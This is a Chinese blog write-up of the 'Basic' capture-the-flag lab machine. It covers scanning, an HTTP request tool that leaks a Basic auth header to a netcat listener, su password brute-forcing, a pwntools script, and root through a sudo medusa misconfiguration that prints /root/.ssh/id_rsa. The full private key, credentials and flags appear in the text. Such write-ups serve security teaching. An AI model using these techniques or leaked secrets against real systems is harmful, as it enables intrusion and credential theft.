Basic

靶机说明

QQ群：660930334

一、主机探测

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# nmap -sn 192.168.2.0/24                                     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-08 09:01 CST
Nmap scan report for 192.168.2.1
Host is up (0.0012s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0020s latency).
MAC Address: 08:00:27:F5:57:69 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.48
Host is up (0.0010s latency).
MAC Address: 08:00:27:3C:D4:7D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.22 seconds

IP地址：192.168.2.48

二、端口扫描

1、全端口扫描

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# nmap --min-rate 10000 -p- 192.168.2.48                      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-08 09:02 CST
Nmap scan report for 192.168.2.48
Host is up (0.00033s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:3C:D4:7D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.69 seconds

开放端口：22，80

2、详细信息扫描

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.48 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-08 09:03 CST
Nmap scan report for 192.168.2.48
Host is up (0.0011s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: HTTP Requester
MAC Address: 08:00:27:3C:D4:7D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.77 seconds

3、UDP端口扫描

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# nmap -sU --top-ports 100 192.168.2.48                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-08 09:04 CST
Nmap scan report for 192.168.2.48
Host is up (0.0020s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:3C:D4:7D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 111.76 seconds

三、WEB渗透

访问80端口，发现是一个Website Request Tool工具

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# curl http://192.168.2.48
<!DOCTYPE html>
<html>
<head>
    <title>HTTP Requester</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            max-width: 800px;
            margin: 0 auto;
            padding: 20px;
            background-color: #f5f5f5;
        }
        .container {
            background-color: white;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 2px 10px rgba(0,0,0,0.1);
        }
        h1 {
            color: #333;
            border-bottom: 2px solid #eee;
            padding-bottom: 10px;
        }
        form {
            margin: 20px 0;
            display: flex;
            gap: 10px;
        }
        input[type="text"] {
            flex: 1;
            padding: 10px;
            border: 1px solid #ddd;
            border-radius: 4px;
        }
        button {
            padding: 10px 20px;
            background-color: #4CAF50;
            color: white;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }
        button:hover {
            background-color: #45a049;
        }
        .result-box {
            margin-top: 20px;
            padding: 15px;
            background-color: #f9f9f9;
            border-left: 4px solid #ccc;
        }
        nav {
            margin-top: 30px;
            display: flex;
            gap: 15px;
        }
        nav a {
            padding: 8px 16px;
            background-color: #e0e0e0;
            border-radius: 4px;
            text-decoration: none;
            color: #333;
        }
        nav a:hover {
            background-color: #d0d0d0;
        }
        pre {
            max-height: 300px;
            overflow: auto;
            padding: 15px;
            background-color: #f8f8f8;
            border: 1px solid #e0e0e0;
            border-radius: 4px;
            white-space: pre-wrap;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Website Request Tool</h1>
        <form method="POST">
            <input type="text" name="url" placeholder="Enter URL starting with http" required>
            <button type="submit">Fetch Content</button>
        </form>
        
        <div class="result-box">
            <h3>Current target:</h3>
            No request made        </div>
        
        <div class="result-box">
            <h3>Response:</h3>
                            <p>Submit URL to test connection</p>
                    </div>
        
        <nav>
            <a href="home.php">Home</a>
            <a href="about.php">About</a>
            <a href="dashboard.php">Dashboard</a>
        </nav>
    </div>
</body>
</html>

1、目录扫描

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# gobuster dir -u http://192.168.2.48 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.48
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html,bak,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 277]
/.html                (Status: 403) [Size: 277]
/about.php            (Status: 200) [Size: 334]
/home.php             (Status: 200) [Size: 334]
/index.php            (Status: 200) [Size: 2675]
/dashboard.php        (Status: 302) [Size: 0] [--> home.php]
/.php                 (Status: 403) [Size: 277]
/.html                (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

没有发现有用目录

2、request 其他服务

kali上开一个服务，尝试让靶机请求，发现可以进行请求

3、Token泄露

kali上开启监听，让靶机进行访问，发现返回了Authorization: Basic

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.48] 57332
GET / HTTP/1.1
Host: 192.168.2.4:4444
Accept: */*
Authorization: Basic Y25oeWs6YmNmODI5NjI3ZWVhMzY0YTNhYmM0MWE2NTM3ZmJmNTQzZTk3NGZmOA==

解密

1
2
3

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# echo "Y25oeWs6YmNmODI5NjI3ZWVhMzY0YTNhYmM0MWE2NTM3ZmJmNTQzZTk3NGZmOA==" | base64 -d
cnhyk:bcf829627eea364a3abc41a6537fbf543e974ff8

4、获取USER权限

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# ssh cnhyk@192.168.2.48
cnhyk@192.168.2.48's password: 
Linux Basic 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
cnhyk@Basic:~$ id
uid=1000(cnhyk) gid=1000(cnhyk) groups=1000(cnhyk)

USER FLAG

1 2	`cnhyk@Basic:~$ cat user.txt flag{user-df31759540dc28f75a20f443a19b1148}`

四、权限提升

1、获取JOJO权限

在/home目录下面，发现用户jojo

方法一爆破

直接尝试爆破用户jojo的密码

cnhyk@Basic:/tmp$ ./suForce -u jojo -w pass.txt 
            _____                          
 ___ _   _ |  ___|__  _ __ ___ ___   
/ __| | | || |_ / _ \| '__/ __/ _ \ 
\__ \ |_| ||  _| (_) | | | (_|  __/  
|___/\__,_||_|  \___/|_|  \___\___|  
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | jojo
📖 Wordlist | pass.txt
🔎 Status   | 2814/10000/28%/jojo
💥 Password | jojo
───────────────────────────────────

找到密码：jojo

方法二OPT

在/opt目录下面找到可执行文件jojo，尝试执行

cnhyk@Basic:/opt$ ./jojo
问题 1: 请输入 67+30
107
错误！
问题 2: 请输入 64+74
64+74
正确！
问题 3: 请输入 80+11
80+11
正确！
问题 4: 请输入 76+61

上传一个socat，将文件挂载到端口

1	`cnhyk@Basic:/tmp$ ./socat TCP-LISTEN:6666,reuseaddr,fork EXEC:/opt/jojo,pty,stderr,setsid`

然后写个脚本执行

from pwn import *
import re

r = remote("192.168.2.48", 6666)

while True:
	try:
		data = r.recv(timeout=2).decode(errors='ignore')
		print(data, end='')

		match = re.search(r"请输入\s*([\d+\-*/\s]+)", data)
		if match:
			expr = match.group(1).strip()
			r.sendline(expr.encode())
	except EOFError:
		print("[*] Connection closed.")
		break

找到密码jojo

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# ssh jojo@192.168.2.48  
jojo@192.168.2.48's password: 
Linux Basic 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jojo@Basic:~$ id
uid=1001(jojo) gid=1001(jojo) groups=1001(jojo)

2、获取ROOT权限

执行sudo -l，发现/usr/bin/medusa可以执行root权限

jojo@Basic:~$ sudo -l
Matching Defaults entries for jojo on Basic:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jojo may run the following commands on Basic:
    (ALL) NOPASSWD: /usr/bin/medusa

查看使用命令

jojo@Basic:~$ /usr/bin/medusa -h
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

/usr/bin/medusa: option requires an argument -- 'h'
CRITICAL: Unknown error processing command-line options.
ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
  -h [TEXT]    : Target hostname or IP address
  -H [FILE]    : File containing target hostnames or IP addresses
  -u [TEXT]    : Username to test
  -U [FILE]    : File containing usernames to test
  -p [TEXT]    : Password to test
  -P [FILE]    : File containing passwords to test
  -C [FILE]    : File containing combo entries. See README for more information.
  -O [FILE]    : File to append log information to
  -e [n/s/ns]  : Additional password checks ([n] No Password, [s] Password = Username)
  -M [TEXT]    : Name of the module to execute (without the .mod extension)
  -m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a
                 different parameter each time and they will all be sent to the module (i.e.
                 -m Param1 -m Param2, etc.)
  -d           : Dump all known modules
  -n [NUM]     : Use for non-default TCP port number
  -s           : Enable SSL
  -g [NUM]     : Give up after trying to connect for NUM seconds (default 3)
  -r [NUM]     : Sleep NUM seconds between retry attempts (default 3)
  -R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
  -c [NUM]     : Time to wait in usec to verify socket is available (default 500 usec).
  -t [NUM]     : Total number of logins to be tested concurrently
  -T [NUM]     : Total number of hosts to be tested concurrently
  -L           : Parallelize logins using one username per thread. The default is to process 
                 the entire username before proceeding.
  -f           : Stop scanning host after first valid username/password found.
  -F           : Stop audit after first valid username/password found on any host.
  -b           : Suppress startup banner
  -q           : Display module's usage information
  -v [NUM]     : Verbose level [0 - 6 (more)]
  -w [NUM]     : Error debug level [0 - 10 (more)]
  -V           : Display version
  -Z [TEXT]    : Resume scan based on map of previous scan

读取root的私钥

jojo@Basic:~$ sudo medusa -H /root/.ssh/id_rsa -u root -p root -M ssh
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

CRITICAL: Failed to resolve hostname: -----BEGIN OPENSSH PRIVATE KEY----- - Name or service not known
CRITICAL: Failed to resolve hostname: b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn - Name or service not known
CRITICAL: Failed to resolve hostname: NhAAAAAwEAAQAAAYEAuo7fDpWRyh52wo83HNHA5DwnBTEx1Y/hs7jnh5GCIBMxK9kg0A9d - Name or service not known
CRITICAL: Failed to resolve hostname: aKHnmsDfnG22fr9ZB3XGDJjZpg86E4MGmzXAQ2FMZfcy0vJ90CIQ4kKrvzj2XvWpu+BkMZ - Name or service not known
CRITICAL: Failed to resolve hostname: ibARGcZa0hzOk+RtbFnWGWWOUx0cTtNiEEWx3v43k8ELG1guQ4PU0jIlV6D70F2R9P6tfn - Name or service not known
CRITICAL: Failed to resolve hostname: BOxr88YSnSsQu0RErnfg+TR2Vs1EGBpC2vY9yhQOn2X3XeCL2ewznq21DLojMkeW/1lyPn - Name or service not known
CRITICAL: Failed to resolve hostname: j/isRTkYXToi+qG+B5KheUtJSGcXb9YMDM4kbCJ0EzRY2lkcZ8Lu8c+6Xyr46nzCKLcx4l - Name or service not known
CRITICAL: Failed to resolve hostname: o13VHNraz6nA1gZZJCOhsaX8h7qdDp4bFFAkDEsIEdWJn3oygQ6HuddXfqlJ+lxw6+ANRw - Name or service not known
CRITICAL: Failed to resolve hostname: jeGQoLCKj1ut0y5AbFmXvNY+DqaFiQr1YbvuWfm7L2l53ca3HMkK0HytG0o7VzAkyLGUpZ - Name or service not known
CRITICAL: Failed to resolve hostname: yv+sF4sspTwdxT7UBt8RVmdOBdU8KhwOgqojj0+rAAAFgCbRPJIm0TySAAAAB3NzaC1yc2 - Name or service not known
CRITICAL: Failed to resolve hostname: EAAAGBALqO3w6VkcoedsKPNxzRwOQ8JwUxMdWP4bO454eRgiATMSvZINAPXWih55rA35xt - Name or service not known
CRITICAL: Failed to resolve hostname: tn6/WQd1xgyY2aYPOhODBps1wENhTGX3MtLyfdAiEOJCq7849l71qbvgZDGYmwERnGWtIc - Name or service not known
CRITICAL: Failed to resolve hostname: zpPkbWxZ1hlljlMdHE7TYhBFsd7+N5PBCxtYLkOD1NIyJVeg+9BdkfT+rX5wTsa/PGEp0r - Name or service not known
CRITICAL: Failed to resolve hostname: ELtERK534Pk0dlbNRBgaQtr2PcoUDp9l913gi9nsM56ttQy6IzJHlv9Zcj54/4rEU5GF06 - Name or service not known
CRITICAL: Failed to resolve hostname: IvqhvgeSoXlLSUhnF2/WDAzOJGwidBM0WNpZHGfC7vHPul8q+Op8wii3MeJaNd1Rza2s+p - Name or service not known
CRITICAL: Failed to resolve hostname: wNYGWSQjobGl/Ie6nQ6eGxRQJAxLCBHViZ96MoEOh7nXV36pSfpccOvgDUcI3hkKCwio9b - Name or service not known
CRITICAL: Failed to resolve hostname: rdMuQGxZl7zWPg6mhYkK9WG77ln5uy9ped3GtxzJCtB8rRtKO1cwJMixlKWcr/rBeLLKU8 - Name or service not known
CRITICAL: Failed to resolve hostname: HcU+1AbfEVZnTgXVPCocDoKqI49PqwAAAAMBAAEAAAGBALdrFJ9QKqBfxz+Ocw8gotdC1N - Name or service not known
CRITICAL: Failed to resolve hostname: JkBa0E41FB8FD3nMpQVD3aIkqtcJcY547dJnyz2YNQOgX9oxRri0GbIuxgHDSpajhVBzoR - Name or service not known
CRITICAL: Failed to resolve hostname: CqUfyNbDR3pNNnKxXHkMay7OdXPVqEAqwmutBthiUdpv+qa7dYg8/vhQ9zAK0i+LhXlOju - Name or service not known
CRITICAL: Failed to resolve hostname: GS9vST0T9kAbEV/QZQP9my0W4Bi57pm1F3YoGn/7E+c5BdSJF7JQY+lj5kQ2roQuPVSHMr - Name or service not known
CRITICAL: Failed to resolve hostname: W0OvK5C8jBvsiV7T+xrKClt9OEseNufcUUA5iaKI+G4qwx3znjt548FxxF6q2Jlp5pEThP - Name or service not known
CRITICAL: Failed to resolve hostname: AMBPFQvb99HL3MNF/paO2lczp9Jl5puiHOAUBF7lAgGsIYPU3wo5GaWl3IEYnfn7lXziB8 - Name or service not known
CRITICAL: Failed to resolve hostname: iVkP0K/gx4yauF159H4IMP7pmh0rDRxLdW2h2GCc2vspJpD9mQ8dBemG+6fUHTJzfgFwR0 - Name or service not known
CRITICAL: Failed to resolve hostname: eTHDHJtzj5q5yK4g/5zaRS8+Vx4iTBYw/aBzWr1WkP4OkmLWyx6NZXzEkw/MxdJyF/oQAA - Name or service not known
CRITICAL: Failed to resolve hostname: AMAchGFcfzr4d/Rv+Q1eaFzNVGFVAmiW2H2Sz9lOZAXw/jARJww9B3Zg3M9q+b5w4SVMeQ - Name or service not known
CRITICAL: Failed to resolve hostname: HJYjgWPy97/KkQZR5U4MC8Ds7zyQY3AhlqJvcDIZeTFMXt44qWmaKiQy2KciVIW30+UAtO - Name or service not known
CRITICAL: Failed to resolve hostname: GOBqPoykzbwgLmh5hJmQGpgzssgMhOM7hIcRMP/Ymhsyw8ok9++FEqSN9mUiXSGR7WbGke - Name or service not known
CRITICAL: Failed to resolve hostname: esb99CYOsc7YCJ0EeZJJEhQIxwFg094NDCjK83j5yOrDssfNIAAADBAN83PifBNXGdRFN0 - Name or service not known
CRITICAL: Failed to resolve hostname: nF5r4QSW1wDQ0CHHOZt0zXYbpjyxASFhtTWfEci5AXWz9jL4qFCLBx77jNfabalhRPlz8E - Name or service not known
CRITICAL: Failed to resolve hostname: 8Gavf8rssqD8+ZcHr/bAPSlfxY9Q+5L6FKAdKl7x70qNiYp7btyAuGFWKfn+lH4sSFCVBA - Name or service not known
CRITICAL: Failed to resolve hostname: MSDsXSQvL5bB6CGFLASboZJLNYO+0iYJ5nGZch+B3HQQ+sk52A3ipR5Om1Trk+ZelV5iH7 - Name or service not known
CRITICAL: Failed to resolve hostname: uMDrSz1Co+0ozDPmfvo9PGrttYqmPpaQAAAMEA1fVTHfJmX8vv4IGthLzeWaosc90bjiMY - Name or service not known
CRITICAL: Failed to resolve hostname: 70FX+KImdoi26V61rccY2IBL6X4KffrL1jTuET12czbwGgZh3KpHbFrXNsc/jxV+sUKVJa - Name or service not known
CRITICAL: Failed to resolve hostname: aKLFd+UNjg756RvevzBMXr5c9ewE6hcdNiwKDBxkBqSbuiBr+oeSMg0G4ppwCGg+G0lBd/ - Name or service not known
CRITICAL: Failed to resolve hostname: ltoRV5MXeIxoYZ6B/jrAbc/Y9kQZ0ozcoSe3zMViGiY++TQf2TPkhiBvu8bRY4vy19nl1c - Name or service not known
CRITICAL: Failed to resolve hostname: mM/HtQ/t5mUZnzAAAACnJvb3RAQmFzaWM= - Name or service not known
CRITICAL: Failed to resolve hostname: -----END OPENSSH PRIVATE KEY----- - Name or service not known

处理一下私钥

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# cat tmp | awk '{print $6}'
-----BEGIN
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
mM/HtQ/t5mUZnzAAAACnJvb3RAQmFzaWM=
-----END

得到完整的私钥

获得ROOT权限

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# ssh root@192.168.2.48 -i id_rsa
Linux Basic 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul  6 08:23:47 2025 from 192.168.3.94
root@Basic:~# id
uid=0(root) gid=0(root) groups=0(root)

ROOT FLAG

1 2	`root@Basic:~# cat root.txt flag{root-c065860911bb44a2483c096cbd203df9}`

【总结】

1、Basic认证

在 HTTP 中，基本认证（Basic access authentication）是一种用来允许网页浏览器或其他客户端程序在请求时提供用户名和密码形式的身份凭证的一种登录验证方式。在基本认证中，请求包含一个格式为 Authorization: Basic <credentials> 的头部字段，其中 credentials 是用户名和密码的 Base64 编码，用一个冒号 : 连接。

2、提权-medusa

medusa可以读取文件内容
sudo medusa -H /root/.ssh/id_rsa -u root -p root -M ssh

Maze-sec

#Basic认证 #sudo-medusa

Basic

http://miao-sec.github.io/Maze-sec/Basic/

作者

Miao

发布于

2025年7月9日

许可协议

BY-MIAO

Config 上一篇

13max 下一篇

Basic

靶机说明

一、主机探测

二、端口扫描

1、全端口扫描

2、详细信息扫描

3、UDP端口扫描

三、WEB渗透

1、目录扫描

2、request 其他服务

3、Token泄露

4、获取USER权限

四、权限提升

1、获取JOJO权限

方法一 爆破

方法二OPT

2、获取ROOT权限

【总结】

1、Basic认证

2、提权-medusa

方法一爆破